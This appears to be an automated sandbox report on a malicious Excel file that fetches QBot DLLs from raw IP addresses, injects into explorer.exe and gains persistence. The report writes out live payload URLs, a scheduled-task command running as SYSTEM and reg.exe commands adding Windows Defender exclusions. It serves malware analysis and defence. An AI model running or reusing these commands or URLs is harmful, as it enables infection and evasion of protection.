    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[1].datJump to dropped file
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 23_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10012AEC GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10029660 GetProcessHeap,RtlAllocateHeap,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1007792E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1007785D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10077464 push dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_1007792E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_1007785D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_10077464 push dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1007792E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1007785D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10077464 push dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 16_2_1007792E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 16_2_1007785D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 16_2_10077464 push dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_00085A61 RtlAddVectoredExceptionHandler,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00085A61 RtlAddVectoredExceptionHandler,

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Maps a DLL or memory area into another processShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Writes to foreign memory regionsShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 9C102D
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 9C102D
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: F0000
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 9C102D
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 9C102D
    Allocates memory in foreign processesShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: F0000 protect: page read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
    Injects code into the Windows Explorer (explorer.exe)Show sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2592 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2592 base: 9C102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 3060 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 3060 base: 9C102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 536 base: F0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 536 base: 9C102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2100 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2100 base: 9C102D value: E9
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: Claim-838392655-09242021.xls, type: SAMPLE
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pmdfegez /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 11:12 /ET 11:24
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Yiiocubi' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Nqsaq' /d '0'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_000831C2 CreateNamedPipeA,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW,

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsCommand and Scripting Interpreter11Scheduled Task/Job1Process Injection412Masquerading121Credential API Hooking1System Time Discovery1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Disable or Modify Tools1LSASS MemorySecurity Software Discovery12Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsScripting2Logon Script (Windows)Logon Script (Windows)Modify Registry1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsNative API1Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol21SIM Card SwapCarrier Billing Fraud
    Cloud AccountsExploitation for Client Execution32Network Logon ScriptNetwork Logon ScriptProcess Injection412LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonScripting2Cached Domain CredentialsSystem Information Discovery15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information11DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 491203 Sample: Claim-838392655-09242021.xls Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 71 Multi AV Scanner detection for dropped file 2->71 73 Multi AV Scanner detection for submitted file 2->73 75 Document exploit detected (drops PE files) 2->75 77 7 other signatures 2->77 9 EXCEL.EXE 189 37 2->9         started        14 regsvr32.exe 2->14         started        16 regsvr32.exe 2->16         started        process3 dnsIp4 65 111.90.148.104, 49166, 80 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY Malaysia 9->65 67 190.14.37.173, 49165, 80 OffshoreRacksSAPA Panama 9->67 69 51.89.115.111, 49167, 80 OVHFR France 9->69 55 C:\Users\user\...\44466.4649013889[3].dat, PE32 9->55 dropped 57 C:\Users\user\...\44466.4649013889[2].dat, PE32 9->57 dropped 59 C:\Users\user\...\44466.4649013889[1].dat, PE32 9->59 dropped 93 Document exploit detected (UrlDownloadToFile) 9->93 18 regsvr32.exe 9->18         started        20 regsvr32.exe 9->20         started        22 regsvr32.exe 9->22         started        24 regsvr32.exe 14->24         started        27 regsvr32.exe 16->27         started        file5 signatures6 process7 signatures8 29 regsvr32.exe 18->29         started        32 regsvr32.exe 20->32         started        34 regsvr32.exe 22->34         started        85 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 24->85 87 Injects code into the Windows Explorer (explorer.exe) 24->87 89 Writes to foreign memory regions 24->89 91 2 other signatures 24->91 36 explorer.exe 8 1 24->36         started        process9 file10 95 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 29->95 97 Injects code into the Windows Explorer (explorer.exe) 29->97 99 Writes to foreign memory regions 29->99 39 explorer.exe 8 1 29->39         started        101 Allocates memory in foreign processes 32->101 103 Maps a DLL or memory area into another process 32->103 42 explorer.exe 32->42         started        45 explorer.exe 34->45         started        53 C:\Users\user\Fiosa.der, PE32 36->53 dropped 105 Uses cmd line tools excessively to alter registry or file data 36->105 47 reg.exe 1 36->47         started        49 reg.exe 1 36->49         started        signatures11 process12 file13 79 Uses cmd line tools excessively to alter registry or file data 39->79 81 Drops PE files to the user root directory 39->81 83 Uses schtasks.exe or at.exe to add and modify task schedules 39->83 51 schtasks.exe 39->51         started        61 C:\Users\user\Fiosa1.der, PE32 42->61 dropped 63 C:\Users\user\Fiosa2.der, PE32 45->63 dropped signatures14 process15

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Claim-838392655-09242021.xls27%ReversingLabsDocument-Office.Trojan.Valyria

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[1].dat29%MetadefenderBrowse
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[1].dat29%ReversingLabsWin32.Infostealer.QBot
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[2].dat29%MetadefenderBrowse
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[2].dat29%ReversingLabsWin32.Infostealer.QBot
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[3].dat29%MetadefenderBrowse
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[3].dat29%ReversingLabsWin32.Infostealer.QBot
    C:\Users\user\Fiosa.der2%ReversingLabs
    C:\Users\user\Fiosa1.der2%ReversingLabs
    C:\Users\user\Fiosa2.der2%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://www.%s.comPA0%URL Reputationsafe
    http://111.90.148.104/44466.4649013889.dat0%Avira URL Cloudsafe
    http://190.14.37.173/44466.4649013889.dat0%Avira URL Cloudsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe
    http://51.89.115.111/44466.4649013889.dat0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://111.90.148.104/44466.4649013889.datfalse
    • Avira URL Cloud: safe
    		unknown
    http://190.14.37.173/44466.4649013889.datfalse
    • Avira URL Cloud: safe
    		unknown
    http://51.89.115.111/44466.4649013889.datfalse
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.%s.comPAregsvr32.exe, 00000005.00000002.519787979.0000000002370000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.575187514.00000000020D0000.00000002.00020000.sdmp, explorer.exe, 00000008.00000002.906659825.0000000002070000.00000002.00020000.sdmpfalse
    • URL Reputation: safe
    		low
    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000005.00000002.519787979.0000000002370000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.575187514.00000000020D0000.00000002.00020000.sdmpfalse
      		high
      http://servername/isapibackend.dllregsvr32.exe, 00000004.00000002.523226546.0000000001CA0000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.519424175.0000000001E40000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.578213273.0000000001CA0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.574806742.0000000001C10000.00000002.00020000.sdmpfalse
      • Avira URL Cloud: safe
      		low

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      190.14.37.173
      		unknownPanama
      		52469OffshoreRacksSAPAfalse
      51.89.115.111
      		unknownFrance
      		16276OVHFRfalse
      111.90.148.104
      		unknownMalaysia
      		45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYfalse

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:491203
      Start date:27.09.2021
      Start time:11:09:24
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 15m 37s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:Claim-838392655-09242021.xls
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:26
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.expl.evad.winXLS@33/11@0/3
      EGA Information:Failed
      HDC Information:
      • Successful, ratio: 24.6% (good quality ratio 23.3%)
      • Quality average: 77.1%
      • Quality standard deviation: 27.1%
      HCA Information:
      • Successful, ratio: 88%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xls
      • Changed system and user locale, location and keyboard layout to English - United States
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
      • TCP Packets have been reduced to 100
      • Not all processes where analyzed, report is missing behavior information
      • Report creation exceeded maximum time and may have missing disassembly code information.
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtSetInformationFile calls found.
      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/491203/sample/Claim-838392655-09242021.xls

      Simulations

      Behavior and APIs

      TimeTypeDescription
      11:10:07API Interceptor55x Sleep call for process: regsvr32.exe modified
      11:10:08API Interceptor865x Sleep call for process: explorer.exe modified
      11:10:16Task SchedulerRun new task: pmdfegez path: regsvr32.exe s>-s "C:\Users\user\Fiosa.der"
      11:10:16API Interceptor1x Sleep call for process: schtasks.exe modified

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[1].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):6.443709384126338
      Encrypted:false
      SSDEEP:6144:8bqzVbbUYjG8AClk8+905KhoSiMsJZuSsnDxeHakVqhhmaM+5Vg0nKH5PnFyunP:OqxgYjG8ACv+iKhpsJZRXH52LMcg5n
      MD5:128C9E74738E40903FC7ADA8627868FE
      SHA1:82BFDBBBCA4DE4D48A27BF0126B3ED02E29F2CDA
      SHA-256:0AC362202467FA5C5C481852D6F5BEEA07FBD0C1A6A67DE96FAB569B0AF6071B
      SHA-512:D6F66AE4257AC3D5442E06977D67C8D031BFFA0F325395ADB0D1CCF90CEBA18BD11C5F97EC3CBBF783F8890E1C72F0ADF44B93DD63D5DA63EC7B5E8E8D13B2BA
      Malicious:true
      Antivirus:
      • Antivirus: Metadefender, Detection: 29%, Browse
      • Antivirus: ReversingLabs, Detection: 29%
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a.T.%}:Y%}:Y%}:Y.rZY&}:Y..DY$}:Y..GY>}:Y..TY.}:Y.rdY"}:Y%};Y.}:Y..UYq}:Y..@Y$}:Y..FY$}:Y..CY$}:YRich%}:Y........................PE..L...y_.E...........!.................1...............................................................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[2].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):6.443709384126338
      Encrypted:false
      SSDEEP:6144:8bqzVbbUYjG8AClk8+905KhoSiMsJZuSsnDxeHakVqhhmaM+5Vg0nKH5PnFyunP:OqxgYjG8ACv+iKhpsJZRXH52LMcg5n
      MD5:128C9E74738E40903FC7ADA8627868FE
      SHA1:82BFDBBBCA4DE4D48A27BF0126B3ED02E29F2CDA
      SHA-256:0AC362202467FA5C5C481852D6F5BEEA07FBD0C1A6A67DE96FAB569B0AF6071B
      SHA-512:D6F66AE4257AC3D5442E06977D67C8D031BFFA0F325395ADB0D1CCF90CEBA18BD11C5F97EC3CBBF783F8890E1C72F0ADF44B93DD63D5DA63EC7B5E8E8D13B2BA
      Malicious:true
      Antivirus:
      • Antivirus: Metadefender, Detection: 29%, Browse
      • Antivirus: ReversingLabs, Detection: 29%
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a.T.%}:Y%}:Y%}:Y.rZY&}:Y..DY$}:Y..GY>}:Y..TY.}:Y.rdY"}:Y%};Y.}:Y..UYq}:Y..@Y$}:Y..FY$}:Y..CY$}:YRich%}:Y........................PE..L...y_.E...........!.................1...............................................................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.4649013889[3].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):6.443709384126338
      Encrypted:false
      SSDEEP:6144:8bqzVbbUYjG8AClk8+905KhoSiMsJZuSsnDxeHakVqhhmaM+5Vg0nKH5PnFyunP:OqxgYjG8ACv+iKhpsJZRXH52LMcg5n
      MD5:128C9E74738E40903FC7ADA8627868FE
      SHA1:82BFDBBBCA4DE4D48A27BF0126B3ED02E29F2CDA
      SHA-256:0AC362202467FA5C5C481852D6F5BEEA07FBD0C1A6A67DE96FAB569B0AF6071B
      SHA-512:D6F66AE4257AC3D5442E06977D67C8D031BFFA0F325395ADB0D1CCF90CEBA18BD11C5F97EC3CBBF783F8890E1C72F0ADF44B93DD63D5DA63EC7B5E8E8D13B2BA
      Malicious:true
      Antivirus:
      • Antivirus: Metadefender, Detection: 29%, Browse
      • Antivirus: ReversingLabs, Detection: 29%
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a.T.%}:Y%}:Y%}:Y.rZY&}:Y..DY$}:Y..GY>}:Y..TY.}:Y.rdY"}:Y%};Y.}:Y..UYq}:Y..@Y$}:Y..FY$}:Y..CY$}:YRich%}:Y........................PE..L...y_.E...........!.................1...............................................................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):162688
      Entropy (8bit):4.254391447071874
      Encrypted:false
      SSDEEP:1536:C6pL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CYJNSc83tKBAvQVCgOtmXmLpLm4l
      MD5:D62FF39274099B2D0889AF912D1E1246
      SHA1:D305B171EB1F89BA68D2E893E7C440DE62B3DD4C
      SHA-256:2180128C16E743A610F283BEA5F7D5959DFDD4D41FE7DA814E9193177F1E1B85
      SHA-512:C191DCD8078F2D2821BEBD87B175706D13DB90104320EC7D1BC5CC60F4046592D293AAE34659C781C26A68C298BE6DD53D8FC262E6E77732C74F4DA7E307D6CC
      Malicious:false
      Reputation:unknown
      Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
      C:\Users\user\Fiosa.der
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):1.374053047991689
      Encrypted:false
      SSDEEP:1536:Z2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:bC6MtAAFNJ5XC5SYCi02r+J
      MD5:24298C861294A6FF97FD5F9E282EAA6B
      SHA1:CB95A2379BD8438E8BB81FEA0B69DF54FD5D8711
      SHA-256:D3DECCC9B1CFCE759BC05D4CD90011F4D75FF502E03D6496C267F78B980293E8
      SHA-512:351DA7E48B6CBD56DECCC1C93A5A90E02F355002C7045F41B9DF0C3BC8B487281C0B1914745C4115D566CE5D1F77F6BD34A14766F99FD474AF96BD9614F2EFDB
      Malicious:true
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 2%
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a.T.%}:Y%}:Y%}:Y.rZY&}:Y..DY$}:Y..GY>}:Y..TY.}:Y.rdY"}:Y%};Y.}:Y..UYq}:Y..@Y$}:Y..FY$}:Y..CY$}:YRich%}:Y........................PE..L...y_.E...........!.................1...............................................................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\Fiosa1.der
      Process:C:\Windows\SysWOW64\explorer.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):495616
      Entropy (8bit):1.374053047991689
      Encrypted:false
      SSDEEP:1536:Z2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:bC6MtAAFNJ5XC5SYCi02r+J
      MD5:24298C861294A6FF97FD5F9E282EAA6B
      SHA1:CB95A2379BD8438E8BB81FEA0B69DF54FD5D8711
